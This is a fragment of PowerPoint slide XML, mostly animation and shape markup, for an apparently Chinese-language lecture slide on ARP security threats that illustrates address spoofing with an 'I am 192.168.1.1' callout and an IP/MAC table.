                                        <p:cTn id="123" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25648"/>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p:cBhvr>
                                        <p:cTn id="125" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25649"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25649"/>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p:cBhvr>
                                        <p:cTn id="128" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25650"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="129" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25650"/>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p:cBhvr>
                                        <p:cTn id="131" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="132" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25646"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="133" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="134" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0 0 C 0.00955 -0.00648 0.01927 -0.01273 0.03073 -0.03078 C 0.04219 -0.04884 0.10938 -0.10972 0.06927 -0.10787 C 0.02917 -0.10601 -0.16684 -0.0324 -0.21024 -0.01898 " pathEditMode="relative" rAng="0" ptsTypes="aaaA">
                                      <p:cBhvr>
                                        <p:cTn id="135" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="136" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="137" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="2" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="138" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25651"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="139" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25651"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="140" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="141" presetID="29" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="142" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="25626"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="143" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25626"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="144" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25626"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect prLst="gradientSize: 0.1">
                                      <p:cBhvr>
                                        <p:cTn id="145" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25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utoUpdateAnimBg="0"/>
      <p:bldP spid="25617" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25618" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25619" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25620" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25621" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25622" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="25623" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25623" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25624" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25624" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25646" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25646" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25646" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25647" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25647" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25647" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25648" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25648" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25648" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25649" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25649" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25649" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25650" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25650" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25650" grpId="2" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25651" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25651" grpId="1" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="25651" grpId="2" bldLvl="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标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址解析协议的安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="266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4"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sp>
        <p:nvSpPr>
          <p:cNvPr id="26635"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6636"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6637"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sp>
        <p:nvSpPr>
          <p:cNvPr id="26638" name="Straight Connector 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3944144" y="3958432"/>
            <a:ext cx="425450" cy="531812"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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26639"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ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26640"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ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26641"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2"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3"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4"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5"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6"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6647" name="Oval Callout 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="4005263"/>
            <a:ext cx="1584325" cy="719137"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70106"/>
              <a:gd name="adj2" fmla="val 64023"/>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lIns="0" tIns="0" rIns="0" bIns="0"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1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>我是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="26649" name="Table 41"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3213100"/>
          <a:ext cx="3348038" cy="1025537"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1511300"/>
                <a:gridCol w="1836738"/>
              </a:tblGrid>
              <a:tr h="360788">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:00:A2</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r>
              <a:tr h="360019">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192.168.1.101</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71996" marB="71996"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00:00:00:00</a:t>
                      </a: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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>:00:A1</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r>
              <a:tr h="304718">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a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="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panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <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rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                        <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26663"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4" name="Explosion 2 42"/>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5" name="Explosion 2 43"/>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6" name="Explosion 2 44"/>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629"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26629"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26628"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26633"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26633"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26636"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26636"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26634"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26634"/>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26637"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2663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6638"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26638"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26639"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26639"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="30" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26640"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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6627"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26627"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26630"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26630"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26631"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26631"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="43" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="26632"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26632"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">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6641"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26641"/>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6642"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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6643"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26643"/>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6644"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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6645"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26645"/>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6646"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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6635"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="266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647"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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p:cBhvr>
                                        <p:cTn id="76" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26647"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2664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6663"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
